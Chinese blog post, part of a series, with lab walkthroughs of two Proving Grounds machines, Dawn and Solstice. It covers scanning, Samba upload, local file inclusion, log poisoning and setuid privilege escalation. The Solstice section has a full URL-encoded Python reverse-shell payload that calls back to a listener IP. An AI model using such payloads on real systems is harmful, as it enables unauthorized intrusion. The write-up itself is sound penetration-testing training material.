iT邦幫忙

2023 iThome 鐵人賽

DAY 25
0

Dawn

防雷頁


























可能的遺漏

  • 是一台有趣的靶機, 可能需要一些想像力, 需要一些推測
  • samba 原本的功能是什麼 ?
  • 進入機器後, 檢查程式檔案權限

摘要

  • 是一台有趣的靶機, 可能需要一些想像力, 需要一些推測
    • 從 log 去推測出排程
  • samba 原本的功能是什麼 ? 有沒有什麼檔案可以上傳
  • 透過找到有 setuid 的程式 zsh 進行提權

Walkthrough

  • 先透過 nmap 確認開什麼 port 和什麼服務
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298CdZCCo9mKS.png

  • gobuster 掃描網站目錄
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298PK9IuAcKKJ.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298DhQlhkCyQU.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298AhRx5WwZIJ.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298BJCrnTm65b.png

  • 手動檢查網站
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298t2uFB8bLiA.png

  • 手動檢查下載的 management.log, 推測可能有排程執行
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298xRjCjtJDWu.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298Om1y3lXDrk.png

  • enum4linux, 發現有 ITDEPT samba 資料夾
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298p5tjiq8Pq0.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298aRte0OXGEY.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298WyT5suRBuI.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298KRsrpCWtTN.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298SPzFONkJLk.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298hj6w7FTulS.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298PoIFasKvpY.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298XCUcY27qcc.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298i66IW5Wc68.png

  • upload reverse shell script
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298oWOnRPpRxJ.png

  • 使用 python 取得 pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298krXkjWnTNp.png

  • find setuid program
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298N8zJVWojNg.png

  • 檢查 /etc/crontab
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298WQo1QeIBtP.png

  • 檢查 /etc/passwd
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298XZiEPnm2kH.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298Ade2ZbwJxZ.png

  • 利用 zsh 提權, get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298LUNI44PtMq.png

ref

Solstice

防雷頁


























可能的遺漏

  • 網站和服務很多, 要有耐心一個一個檢查, 注意可能有 Rabbit Hole
  • 是一台有趣的靶機, 可能需要一些想像力, 提示比較不足
  • 進入機器後, 檢查程序權限

摘要

  • 網站和服務很多, 要有耐心一個一個檢查, 注意可能有 Rabbit Hole
    • 本次解題沒有利用到 ftp
    • 本次解題沒有利用到 smtp
  • 是一台有趣的靶機, 可能需要一些想像力, 提示比較不足
    • LFI(Local File Inclusion)
    • 利用寫入 /var/log/apache2/access.log 檔案
  • 進入機器後, 檢查程序權限, 有一個 php 是用 root 去跑的

Walkthrough

  • 先透過 nmap 確認開什麼 port 和什麼服務
    https://ithelp.ithome.com.tw/upload/images/20231009/200782981lxSdh9jEV.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298sKAj2fjvWF.png

  • dirb 掃描網站目錄(80 port)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298A838kp3tfI.png

  • dirb 掃描網站目錄(8593 port)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298Axrztoav4t.png

  • 手動檢查網站(80 port)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298IlAKgSvlQ5.png

  • 手動檢查網站(8593 port)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298fq0EImPXQn.png

  • 手動檢查網站(8593 port), 點擊 Book List
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298ReSPbTghAu.png

  • 手動測試網站(Local File Inclusion), 成功, 發現有使用者 miguel
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298A8RNTJTQ2X.png

  • Local File Inclusion(/home/miguel/.bash_history), 為空
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298xn4bf1PMfa.png

  • Local File Inclusion(/home/miguel/.ssh/id_rsa), 為空
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298zQSLYfmmXB.png

  • Local File Inclusion(/var/log/apache2/access.log)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298T13FPM7DNk.png

  • Local File Inclusion(/var/www/html/index.html)
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298PvTs2fK18B.png

  • 利用 curl 的參數自訂 User-Agent, 嘗試寫入 /var/log/apache2/access.log
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298P4n538pOyh.png

  • 嘗試寫入 webshell, 執行成功
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298o91HJ2VNaZ.png

  • reverse shell

1=system(%22python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\%22192.168.45.168\%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(\%22sh\%22)%27%22);

https://ithelp.ithome.com.tw/upload/images/20231009/20078298RzOYH0um5x.png

  • 使用 python 取得 pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298WbRSnU0skr.png

  • find setuid program
    https://ithelp.ithome.com.tw/upload/images/20231009/200782985Nvt30bkyZ.png

  • 檢查 /etc/crontab
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298Zq1sJkZ2p2.png

  • 檢查 /etc/passwd
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298HWRhMZLjRO.png
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298wgo5VFlxOS.png

  • 檢查有 setuid 的項目, 發現是一個可以寫入的 php 檔案
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298pvI0eJEJZB.png

  • 檢查 ps aux, 有一個用 root 跑的 php
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298sPO8cgVXFz.png

  • 檢查 netstat, 確實在 127.0.0.1:57 有 listen port
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298W8Nzheeyfd.png

  • curl 檢查 127.0.0.1:57
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298D4xFO2IUDw.png

  • 利用修改 index.php, 給予 find setuid 的權限.
    https://ithelp.ithome.com.tw/upload/images/20231009/20078298u2TZi9BzDH.png

  • 利用 find 提權, get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20231009/2007829836tVjuTo1H.png

ref


上一篇
[Day 24] PG Play Amaterasu & Photographer Writeup
下一篇
[Day 26] PG Play Ha-natraj & Inclusiveness Writeup
系列文
PG Play 怎麼玩都不累 - 靶機 writeup 思路分享30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言